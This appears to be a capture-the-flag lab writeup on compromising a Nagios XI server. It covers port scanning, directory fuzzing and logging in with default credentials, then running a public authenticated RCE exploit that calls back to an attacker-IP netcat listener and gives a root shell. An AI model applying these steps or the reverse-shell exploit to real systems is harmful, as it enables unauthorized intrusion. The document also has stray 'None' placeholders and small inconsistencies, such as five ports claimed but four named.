I scanned the target to discover open ports ports:

  • nmap -p- -sC -A -T4 <TARGET-IP>
None
None

Result:

  • There were 5 open ports on the target system (ssh, smtp, http, and smb)

Step 2: Enumeration

I began enumeration of port 80 by running a ffuf scan to discover web directories:

  • ffuf -u http://<TARGET-IP>/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -mc 200,301,302,403 -e .php,.bak,.txt,.js,.json,.xml
None
None

Result:

  • 1 Directory was found; javascript

The next thing I did was visit the target in the firefox browser:

  • http://<TARGET-IP>
None

Result:

  • There was a nagios cms web application being hosted as the nmap results had told us, that required credentials

There weren't any credentials within the smb shares so I had searched up what default credentials were for nagios via OSINT as this was the first time seeing this cms

None

Result:

  • There were login credentials for nagios

The credentials found publicly didn't work but they were a starting point, I had to make smart because the password wasn't correct but I eventually was able to login:

  • username:nagiosadmin, password:admin
None

Step 3: Enumeration

I scrutinized everything within the nagios portal but there wasn't anything such as a place to upload files or execute code so that I could get a reverse shell so I searched exploit-db for existing exploits:

  • searchsploit nagios 5.6
None

Result:

  • There was a Authenticated Remote Execution exploit for nagios

I copied the exploit to my machine, and then checked the exploits usage as and other looked at other configurations:

  • searchsploit -m multiple/webapps/52138.txt (download the script)
  • cat 52138.txt (display the contents of the script)
None
None

Before I ran the exploit I setup a listener in preparation to catch the connection and get a shell:

  • rlwrap nc -lvnp 443
None

After setting up the listener I ran the script:

  • python3 exp.py -t <http://<TARGET-IP> -b /nagiosxi -u nagiosadmin -p 'admin' -lh <ATTACKER-IP> -lp <listeners-port>
None
None

Result:

  • The exploit successfully worked and I was able to catch the connection on my listener, resulting in a shell

Step 4: Post Exploitation

Lastly, as the exploit gives me a shell as the root user, all I did was list all the files and retrieved the root flag:

  • ls -la
  • cat proof.txt
None

Thanks for reading this writeup hopefully it helped you out, stay tuned for many more writeups